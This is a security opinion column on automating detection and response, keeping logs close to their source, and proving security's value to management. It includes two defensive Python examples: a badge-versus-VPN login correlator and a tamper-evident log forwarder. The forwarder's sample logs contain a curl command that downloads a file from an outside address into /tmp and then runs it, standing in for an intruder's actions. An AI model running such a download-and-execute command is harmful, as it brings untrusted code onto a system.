Depending on how you look at it, the past year was either tough for security professionals or it showed the world how complex and interesting this field really is. After all, we're not working to identify some deterministic software bug — we're combatting real adversaries who are constantly testing our defenses.
Like many of you, I spend a lot of time talking to customers, partners, and other security professionals, and there is clearly a lot we can do to become more effective for our organizations. Here is my take on what the security community should resolve to accomplish or overcome as we move forward.
1. Embrace the machine.
We have access to platforms today that expose APIs to other systems and can run large correlations across data from many sources: logins, proximity card reads, Web behavior, locations. We have agents on users' machines that log process execution. And we have rich, curated threat intelligence from third-party vendors and other experts.
Because all that information can be correlated almost instantaneously, today's correlation engines do what analysts used to do by hand, only much faster: they compute the correlations in near-real time, reconstruct what happened, and prioritize events for an analyst to review.
Taking it a step further, correlation engines are now good enough that, for well-understood patterns, they can classify an activity as malicious with enough confidence to act on. The challenge is to let go and allow the machine to loop back into firewalls, endpoint security, and applications and actively mitigate the threat, with analysts reviewing what it did rather than approving every action first.
Embracing automation in this way can reduce response times from months to milliseconds, produce logs that are more relevant, and expose APIs so that the rest of the stack (firewalls, mail filters, endpoint agents) can act on the engine's output.
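Here is what such a correlation-and-response loop looks like in miniature, as an added example that is not code from the original column. It joins two of the sources named above, badge-reader events and VPN logins, flags a user who badged into one site and then logged in from another within an hour, and turns each conflict into the containment actions an orchestration loop would push back into the firewall and identity provider. The event layout, site names, addresses and action dictionaries are assumptions made for illustration.

```python
"""Correlate badge-reader events with remote logins and turn a conflict into
containment actions for the firewall and identity system.

Added example; not code from the original column. The event layout, site
names, addresses and the action dictionaries are assumptions made for
illustration (a real loop would read events from a SIEM and push the actions
to a firewall / IdP API).
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    ts: datetime
    user: str
    kind: str          # "badge" (physical access) or "vpn_login"
    site: str          # badge reader location, or geolocation of the VPN source
    src_ip: str = ""   # only meaningful for vpn_login


# Constructed sample telemetry (not real data). Alice badges into the New
# York office and twelve minutes later a successful VPN login for her account
# arrives from Frankfurt; Bob badges in and logs in from the same city.
SAMPLE_EVENTS = [
    Event(datetime(2024, 3, 4, 9, 1), "alice", "badge", "NYC"),
    Event(datetime(2024, 3, 4, 9, 13), "alice", "vpn_login", "FRA", "203.0.113.7"),
    Event(datetime(2024, 3, 4, 9, 5), "bob", "badge", "NYC"),
    Event(datetime(2024, 3, 4, 9, 20), "bob", "vpn_login", "NYC", "198.51.100.20"),
]

WINDOW = timedelta(hours=1)


def find_presence_conflicts(events, window=WINDOW):
    """Return (badge_event, login_event) pairs for users who badged into one
    site and, within `window`, logged in remotely from a different site."""
    by_user = {}
    for e in sorted(events, key=lambda e: e.ts):
        by_user.setdefault(e.user, []).append(e)
    conflicts = []
    for evs in by_user.values():
        badges = [e for e in evs if e.kind == "badge"]
        logins = [e for e in evs if e.kind == "vpn_login"]
        for b in badges:
            for lg in logins:
                if abs(lg.ts - b.ts) <= window and lg.site != b.site:
                    conflicts.append((b, lg))
    return conflicts


def plan_actions(conflicts):
    """Map each conflict to the actions an automated loop would push back into
    the firewall and the identity provider (dictionary shape is an assumption)."""
    actions = []
    for badge, login in conflicts:
        reason = (f"{login.user} badged into {badge.site} at {badge.ts:%H:%M} "
                  f"but logged in from {login.site} at {login.ts:%H:%M}")
        actions.append({"action": "firewall_block", "ip": login.src_ip, "reason": reason})
        actions.append({"action": "revoke_sessions", "user": login.user, "reason": reason})
    return actions


def run(events=SAMPLE_EVENTS):
    """One pass of the detect-then-act loop; returns the planned actions."""
    return plan_actions(find_presence_conflicts(events))


if __name__ == "__main__":
    for a in run():
        print(a)
```

The point of the `reason` string is that every automated action carries the evidence behind it, so the analyst who reviews the loop afterwards sees the same correlation the machine acted on.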
2. Consume farm-to-table security data.
CISOs need to understand the difference between primary data (the raw event as the system recorded it) and secondary data (what is left after an intermediate system has filtered, summarized or reshaped it), and get as close to the source as possible when automating. The closer our data points are to the user and the machine, the less risk we run of building a model on a distorted picture.
The key is to capture logs at the time of creation and ship them off the host immediately, so that, unless the event logging system itself is compromised, you get unfiltered truth. If you instead go back to a machine after an attacker has cleaned up his toolset and deleted the local log, the tracks may already be covered.
To this end, you have to constantly evaluate log sources: how quickly is the data logged and delivered, what is the source, is there redundancy, and which fields (hostname, user, timestamp, source address) serve as the correlation points that enable a true picture of what's happening with each machine on the network?
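The following is an added example, not code from the original column, that makes the two points above checkable. A forwarder on the source host stamps every event with a sequence number and a hash chained to the previous record at the moment the event is created; the collector then verifies the chain, reports gaps (deleted records), edits and delivery lag. The demo runs the same five constructed events through both collection models: shipped at creation, and collected hours later after an intruder has deleted one record and rewritten another. The record layout, host name, sample log bodies and the 30-second freshness threshold are assumptions made for illustration.

```python
"""Tamper-evident, sequence-numbered log forwarding with collector-side checks
for gaps, edits and delivery lag.

Added example; not code from the original column. The record layout, host
name, sample log bodies and the 30-second freshness threshold are assumptions
made for illustration.
"""
import hashlib
from datetime import datetime, timedelta

GENESIS = "0" * 64


def chain_hash(prev_hash, seq, ts, body):
    """Hash of this record bound to the previous record's hash."""
    h = hashlib.sha256()
    h.update(prev_hash.encode())
    h.update(f"{seq}|{ts}|{body}".encode())
    return h.hexdigest()


class Forwarder:
    """Runs on the source host: stamps each event with a sequence number and
    a hash chained to the previous record at the moment the event is created,
    before anything on the host can edit or delete it."""

    def __init__(self, host):
        self.host, self.seq, self.prev = host, 0, GENESIS

    def emit(self, ts, body):
        self.seq += 1
        rec = {"host": self.host, "seq": self.seq, "ts": ts.isoformat(),
               "body": body, "prev": self.prev}
        rec["hash"] = chain_hash(self.prev, self.seq, rec["ts"], body)
        self.prev = rec["hash"]
        return rec


def verify_stream(records, received_at, max_lag=timedelta(seconds=30)):
    """Collector-side check. Returns a list of findings: 'gap' (records
    missing), 'break' (record replaced or reordered), 'tampered' (body or
    timestamp edited after creation), 'stale' (arrived long after creation)."""
    findings = []
    expected_seq, prev = 1, GENESIS
    for rec, rx in zip(records, received_at):
        if rec["seq"] != expected_seq:
            findings.append(f"gap: expected seq {expected_seq}, got {rec['seq']}")
        elif rec["prev"] != prev:
            findings.append(f"break: seq {rec['seq']} does not chain to the previous record")
        if chain_hash(rec["prev"], rec["seq"], rec["ts"], rec["body"]) != rec["hash"]:
            findings.append(f"tampered: seq {rec['seq']} content does not match its hash")
        lag = rx - datetime.fromisoformat(rec["ts"])
        if lag > max_lag:
            findings.append(f"stale: seq {rec['seq']} arrived {lag.total_seconds():.0f}s after creation")
        expected_seq, prev = rec["seq"] + 1, rec["hash"]
    return findings


# Constructed sample events from one host (not real data).
SAMPLE_BODIES = [
    "sshd: Accepted publickey for deploy from 198.51.100.4",
    "sudo: deploy : COMMAND=/usr/bin/curl -o /tmp/x http://203.0.113.9/x",
    "sudo: deploy : COMMAND=/tmp/x",
    "sshd: Accepted publickey for deploy from 198.51.100.4",
    "sshd: session closed for user deploy",
]


def demo():
    """Compare the two collection models. Returns (live_findings, late_findings)."""
    t0 = datetime(2024, 3, 4, 9, 0, 0)
    fwd = Forwarder("web01")
    records = [fwd.emit(t0 + timedelta(seconds=i), b) for i, b in enumerate(SAMPLE_BODIES)]

    # Farm-to-table: each record leaves the host about a second after creation.
    live_rx = [t0 + timedelta(seconds=i + 1) for i in range(len(records))]
    live = verify_stream(records, live_rx)

    # Late collection: the intruder deleted the record of the tool execution
    # (seq 3) and rewrote the download command (seq 2) to look benign; the
    # collector only reads the file six hours later.
    cleaned = [dict(r) for r in records if r["seq"] != 3]
    cleaned[1]["body"] = "sudo: deploy : COMMAND=/usr/bin/apt-get update"
    late_rx = [t0 + timedelta(hours=6)] * len(cleaned)
    late = verify_stream(cleaned, late_rx)
    return live, late


if __name__ == "__main__":
    live, late = demo()
    print("shipped at creation:", live or "no findings")
    print("collected 6h later:", *late, sep="\n  ")
```

The chain does not stop an attacker with root from deleting records; it makes the deletion visible to the collector, which is the most the source host can offer once it is compromised. Redundancy (a second, independent source such as network flow records) is what fills the gap the collector reports.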
3. Give back to the community.
On both a human and machine level, getting better at security is an iterative process. When an intrusion analyst identifies something, engineering should encode that knowledge into the correlation engine. Over time this loop, from analyst finding to engineering change to the network's defenses and back, lets you automate what the analyst does and makes every piece more effective.
Now it's time to share what you’ve learned. Ideally, that information should go to a major threat intel vendor to be correlated with other data so the broader security community can benefit as well.
4. Let analysts analyze.
Information security pros and analysts are expensive. If there is a host of alerts that machines can suppress or resolve on their own, those people are freed to add value elsewhere, and the C-suite sees a return on the investments it has made in security.
And believe it or not, this is also a retention mechanism. Why? Because now only the really hard problems are turned over to analysts, which makes them happy. This is ultimately why many of us go into the security industry in the first place. We're dealing with human adversaries who are actively and continually adjusting their software and tactics to get into your network. It's a battle of wits and knowledge. That part of the job is much more compelling than poring over extensive activity logs.
5. Prove your value — and the value of future investments.
CISOs are great at a lot of things, but demonstrating our value isn't always one of them. For many years, security was neglected. Only in the last decade has it come into its own, and only in the last couple of years has it really entered the broader public consciousness. Now we need to take another step toward connecting the dots between risk and value.
When we hear that competitors, customers, or peers have experienced breaches, we should alert management. If a company similar to yours lost customer data or intellectual property, or was hacked because of software you have in common, brief management on that too. Build a case study or a presentation to demonstrate how your architecture can (or did) prevent a similar attack.
Ditto when things happen in your own network. When your defenses detect a ransomware attack, it demonstrates the value of management-approved investments: the endpoint security software you bought detected the attack within 100 milliseconds, your correlation engine pushed the indicator back into the email filtering system, and the backup system just paid for itself because you were able to recover the lost work from a copy that was only three hours old. The system worked. You won.
And if you didn't win, what mitigations could have prevented the loss? Management should know that too, so they have a clear understanding of where to invest next.
Commit to Making It Happen
So what's the point of all this? First, you need to close the time gap. Going 200 days until detection of an intrusion isn't acceptable when it's possible to detect many threats in 150 milliseconds and fan out a protection to every machine in the enterprise in another 150 milliseconds.
And second, organizations can only achieve that level of effectiveness when the CISO and upper management commit to embracing automation. Yes, it takes engineering, technical knowledge, and the right gear. But in the end, it's the commitment by the organization that makes it all work.